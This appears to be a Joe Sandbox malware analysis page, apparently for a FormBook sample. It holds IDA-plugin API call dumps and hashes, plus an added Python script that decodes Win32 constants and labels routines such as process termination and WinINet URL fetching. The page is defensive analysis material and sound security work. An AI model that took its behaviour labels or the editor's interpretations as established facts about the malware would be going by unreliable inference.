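                                     The API summaries in these function blocks are raw stack dumps from the Joe Sandbox IDA plugin: message IDs, access masks and flags are printed as bare hex, and every parameter slot beyond a call's real argument count is whatever earlier calls left on the stack. The Python below is an added example, not part of this report or of Joe Sandbox's tooling. It parses a constructed copy of the lines from the WM_CLOSE/TerminateProcess routine (ref 00F656CF above), the WinINet routine (ref 00F71B40 above) and the CreatePipe/"nul" routine (ref 00F670DD, further down this page), decodes the documented Win32 constants at the positions where they are meaningful (0x10 = WM_CLOSE, 0x1F0FFF = PROCESS_ALL_ACCESS, 5 = HTTP_QUERY_CONTENT_LENGTH, 0x40000000 = GENERIC_WRITE, 3 = OPEN_EXISTING), and labels each routine with the behaviour a triager would record. The constant table, the behaviour labels and the SAMPLE_BLOCKS input are this example's own; reading these three routines as the AutoIt interpreter's runtime helpers rather than FormBook code is the editor's interpretation, consistent with the report's "compiled AutoIt script" signature but not stated by the report itself.

```python
"""Decode the per-function "APIs" lines of a Joe Sandbox report.

Added example for this page, not Joe Sandbox's own tooling. SAMPLE_BLOCKS is
constructed from three function blocks in the report (the WM_CLOSE /
TerminateProcess routine, the WinINet routine and the CreatePipe / "nul"
routine). Names in KNOWN are the documented Win32 constants for those
parameter positions. The sandbox prints raw stack slots, so values past a
call's real parameter count are leftovers from earlier calls and are not decoded.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple, Union

Arg = Union[int, str, None]

# "• Api.MODULE(arg,arg,...), ref: XXXXXXXX"  (parens are absent for LIBCMT stubs)
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)

# (API, zero-based parameter index) -> {raw value: symbolic name}; example's own table
KNOWN: Dict[Tuple[str, int], Dict[int, str]] = {
    ("PostMessageW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("HttpQueryInfoW", 1): {0x5: "HTTP_QUERY_CONTENT_LENGTH"},
    ("CreateFileW", 1): {0x40000000: "GENERIC_WRITE"},
    ("CreateFileW", 2): {0x2: "FILE_SHARE_WRITE"},
    ("CreateFileW", 4): {0x3: "OPEN_EXISTING"},
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: str
    subcall_of: Optional[str] = None          # set for "Part of subcall function" lines
    decoded: Dict[int, str] = field(default_factory=dict)

def parse_arg(tok: str) -> Arg:
    """'001F0FFF' -> 0x1F0FFF, '-00000002' -> -2, '?' -> None, 'nul' -> 'nul'."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    m = re.fullmatch(r"(-?)([0-9A-F]{8})", tok)
    if not m:
        return tok                            # literal string argument
    value = int(m.group(2), 16)
    return -value if m.group(1) else value

def parse_block(text: str) -> List[ApiCall]:
    """Turn one function's APIs section into ApiCall records with known constants decoded."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:                             # "APIs" header, blank lines, anything else
            continue
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] is not None else []
        call = ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"])
        for idx, value in enumerate(args):
            names = KNOWN.get((call.api, idx))
            if names and isinstance(value, int) and value in names:
                call.decoded[idx] = names[value]
        calls.append(call)
    return calls

def classify(calls: List[ApiCall]) -> List[str]:
    """Map the routine's direct calls to the behaviour labels a triager would record."""
    direct = {c.api for c in calls if c.subcall_of is None}
    found = []
    if {"GetWindowThreadProcessId", "OpenProcess", "TerminateProcess"} <= direct:
        found.append("kills the process that owns a window (WinKill-style)")
    if {"InternetOpenUrlW", "HttpQueryInfoW"} <= direct:
        found.append("fetches a URL over WinINet and reads Content-Length")
    if "CreatePipe" in direct and any(
            c.api == "CreateFileW" and c.args[:1] == ["nul"] for c in calls):
        found.append("redirects a standard handle to NUL (child-process I/O setup)")
    return found

# Constructed input: copied from the report's function blocks, one routine per key.
SAMPLE_BLOCKS = {
    "winkill": """APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F6569B
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F656B1
• GetWindowThreadProcessId.USER32(?,?), ref: 00F656C0
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F656CF
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F656D9
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F656E0
""",
    "inet": """• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F71B40
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F71B66
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F71B96
• InternetCloseHandle.WININET(00000000), ref: 00F71BDD
  • Part of subcall function 00F72777: GetLastError.KERNEL32(?,?,00F71B0B,00000000,00000000,00000001), ref: 00F7278C
  • Part of subcall function 00F72777: SetEvent.KERNEL32(?,?,00F71B0B,00000000,00000000,00000001), ref: 00F727A1
""",
    "stdio": """• GetStdHandle.KERNEL32(0000000C), ref: 00F6705E
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F67091
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F670DD
""",
}

if __name__ == "__main__":
    for name, block in SAMPLE_BLOCKS.items():
        calls = parse_block(block)
        print(f"[{name}] {', '.join(classify(calls)) or 'no label'}")
        for c in calls:
            if c.decoded:
                print(f"  {c.api} @ {c.ref}: "
                      + ", ".join(f"arg{i}={n}" for i, n in sorted(c.decoded.items())))
```

                                     The behaviour labels deliberately ignore "Part of subcall function" lines, since those describe callees shared by many routines (the GetLastError/SetEvent pair appears under several blocks on this page) and would otherwise produce false matches. Extending KNOWN to other blocks above is mechanical: for example MapVirtualKeyW position 0 (0x5B = VK_LWIN, 0x10 = VK_SHIFT, 0x11 = VK_CONTROL, 0x12 = VK_MENU) or SendMessageW position 1 (0x188 = LB_GETCURSEL, 0x189 = LB_GETTEXT, 0x18A = LB_GETTEXTLEN, 0x467 = ACM_OPENW).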
                                    APIs
                                      • Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
                                      • Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
                                      • Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F866D0
                                    • LoadLibraryW.KERNEL32(?), ref: 00F866D7
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F866EC
                                    • DestroyWindow.USER32(?), ref: 00F866F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F6705E
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F67091
                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F670A3
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F670DD
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F6712B
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F6715D
                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F6716E
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F671A8
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00F6AEBF
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F6AF13
                                    • __swprintf.LIBCMT ref: 00F6AF2C
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F8F910), ref: 00F6AF6A
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    APIs
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                      • Part of subcall function 00F5A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F5A399
                                      • Part of subcall function 00F5A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F5A3AC
                                      • Part of subcall function 00F5A37C: GetCurrentThreadId.KERNEL32 ref: 00F5A3B3
                                      • Part of subcall function 00F5A37C: AttachThreadInput.USER32(00000000), ref: 00F5A3BA
                                    • GetFocus.USER32 ref: 00F5A554
                                      • Part of subcall function 00F5A3C5: GetParent.USER32(?), ref: 00F5A3D3
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F5A59D
                                    • EnumChildWindows.USER32(?,00F5A615), ref: 00F5A5C5
                                    • __swprintf.LIBCMT ref: 00F5A5DF
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                    • String ID: %s%d
                                    • API String ID: 1941087503-1110647743
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00F62048
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 3964851224-769500911
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F8F910), ref: 00F7903D
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F8F910), ref: 00F79071
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F791EB
                                    • SysFreeString.OLEAUT32(?), ref: 00F79215
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F7EF1B
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F7EF4B
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F7F07E
                                    • CloseHandle.KERNEL32(?), ref: 00F7F0FF
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F80038,?,?), ref: 00F810BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80388
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F803C7
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F8040E
                                    • RegCloseKey.ADVAPI32(?,?), ref: 00F8043A
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F80447
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                    • String ID:
                                    • API String ID: 3440857362-0
                                    APIs
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F7DC3B
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F7DCBE
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F7DCDA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F7DD1B
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F7DD35
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67B20,?,?,00000000), ref: 00F05B8C
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67B20,?,?,00000000,?,?), ref: 00F05BB0
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F6E88A
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F6E8B3
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F6E8F2
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F6E917
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F6E91F
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00F02357
                                    • ScreenToClient.USER32(00FC67B0,?), ref: 00F02374
                                    • GetAsyncKeyState.USER32(00000001), ref: 00F02399
                                    • GetAsyncKeyState.USER32(00000002), ref: 00F023A7
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: dbd576ba378bd4d9c5b8ba63ba9db60c37cb3e9bac0a2e1d6875a74b578de120
                                    • Instruction ID: 7bcee8bd4fef7c0a513531a34f86d06e9653e64653b2cc46d4b33b11f2d7f974
                                    • Opcode Fuzzy Hash: dbd576ba378bd4d9c5b8ba63ba9db60c37cb3e9bac0a2e1d6875a74b578de120
                                    • Instruction Fuzzy Hash: D7415C31904119FBDF559FA8CC48AEABB74BB05330F20431AF828A62D0C7349954FBA1
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F5695D
                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00F569A9
                                    • TranslateMessage.USER32(?), ref: 00F569D2
                                    • DispatchMessageW.USER32(?), ref: 00F569DC
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F569EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                    • String ID:
                                    • API String ID: 2108273632-0
                                    • Opcode ID: c46833edc059f5535a56d59904b0278bc262b219c2e7f294540ffed46a155fe5
                                    • Instruction ID: da30cc43241e274d23b7586c9ae91e20a1280039ecbf7c0e30013ef86bec9749
                                    • Opcode Fuzzy Hash: c46833edc059f5535a56d59904b0278bc262b219c2e7f294540ffed46a155fe5
                                    • Instruction Fuzzy Hash: 1731C47190824AAEDB208F74CC45FF6BBA8AB05326F544569EA31D30A1E735988DF790
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 00F58F12
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00F58FBC
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F58FC4
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00F58FD2
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F58FDA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: 75b24ea03ce706897d724e4b253a60672f7761faa5c993b31a6e84d33624b443
                                    • Instruction ID: 0e7daf30ebd4916b8437b6accfca86c32b80649900aaea547c4a738cd0a46d75
                                    • Opcode Fuzzy Hash: 75b24ea03ce706897d724e4b253a60672f7761faa5c993b31a6e84d33624b443
                                    • Instruction Fuzzy Hash: 8C31D171900219EFDB00CF68DD4CAEE7BB6EB08326F104229FE25E61D1C7709918EB50
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 00F5B6C7
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F5B6E4
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F5B71C
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F5B742
                                    • _wcsstr.LIBCMT ref: 00F5B74C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    • Opcode ID: 12dd218b1cdb156016bf6aae13b08d3ddb9322ea05372dbf6e4a7dff1d0a9f70
                                    • Instruction ID: 99c96b225a4ba45af6372a74f23863710a2d2b84aa9fa980dc27ae2a9ad740c8
                                    • Opcode Fuzzy Hash: 12dd218b1cdb156016bf6aae13b08d3ddb9322ea05372dbf6e4a7dff1d0a9f70
                                    • Instruction Fuzzy Hash: 06210732604248BEEB255B39AC49E7B7B98EF89721F104079FD05CA1A1EF65CC44B3A0
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F8B44C
                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F8B471
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F8B489
                                    • GetSystemMetrics.USER32(00000004), ref: 00F8B4B2
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F71184,00000000), ref: 00F8B4D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Long$MetricsSystem
                                    • String ID:
                                    • API String ID: 2294984445-0
                                    • Opcode ID: d732b27ec639106c615fa36a11d1572ad142977f47e95eae2ff84490f3275b10
                                    • Instruction ID: 6dca570c814763a563526cfa3335a5e0be40f2e097f10661f50ba253cb19994a
                                    • Opcode Fuzzy Hash: d732b27ec639106c615fa36a11d1572ad142977f47e95eae2ff84490f3275b10
                                    • Instruction Fuzzy Hash: CE216071914256AFCB10EF38CC09BAA3BA4FB05731B144729F926D71E2E7309855FB90
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F59802
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F59834
                                    • __itow.LIBCMT ref: 00F5984C
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F59874
                                    • __itow.LIBCMT ref: 00F59885
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow$_memmove
                                    • String ID:
                                    • API String ID: 2983881199-0
                                    • Opcode ID: dc63b60c6724e9c2355881d2a8dce07c9cb89d1dc289c5a234fd67998d84227b
                                    • Instruction ID: 320653d225eea9f183be0130d61f16f13ce2c5a7c7b5a8dc96bca817087c7a41
                                    • Opcode Fuzzy Hash: dc63b60c6724e9c2355881d2a8dce07c9cb89d1dc289c5a234fd67998d84227b
                                    • Instruction Fuzzy Hash: 3B21D671B05208EBDB14AB61CC86EEE3BA9EF49722F440064FE04DB281D6B49D49B791
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F0134D
                                    • SelectObject.GDI32(?,00000000), ref: 00F0135C
                                    • BeginPath.GDI32(?), ref: 00F01373
                                    • SelectObject.GDI32(?,00000000), ref: 00F0139C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 9b36ccb7a6de4ad2146d024dcd2c5cfc65f250293ff290a3c2900630ed58dd50
                                    • Instruction ID: 54ba155a62fa65ec7fa8d6a320b780282d4fbdd6fa4ad936ce7926fd12f7eaab
                                    • Opcode Fuzzy Hash: 9b36ccb7a6de4ad2146d024dcd2c5cfc65f250293ff290a3c2900630ed58dd50
                                    • Instruction Fuzzy Hash: 25211671804208EFDB119F25DE0ABAA7BA8BF00321F648226F811D71E0D7729995FB91
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: e2c8aded380581296322700c5910110bcf43e38803e561db99550beee8e733b5
                                    • Instruction ID: 62d7c9406704d7cf41dde32422c7eb45f0f651f5bedac881b3a72bff6f615d4a
                                    • Opcode Fuzzy Hash: e2c8aded380581296322700c5910110bcf43e38803e561db99550beee8e733b5
                                    • Instruction Fuzzy Hash: BB01F5B2A057153FE604A6209C46FAF7B9CAB213A5F044021FE0696283EB54DE15F2E5
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 00F64D5C
                                    • __beginthreadex.LIBCMT ref: 00F64D7A
                                    • MessageBoxW.USER32(?,?,?,?), ref: 00F64D8F
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F64DA5
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F64DAC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
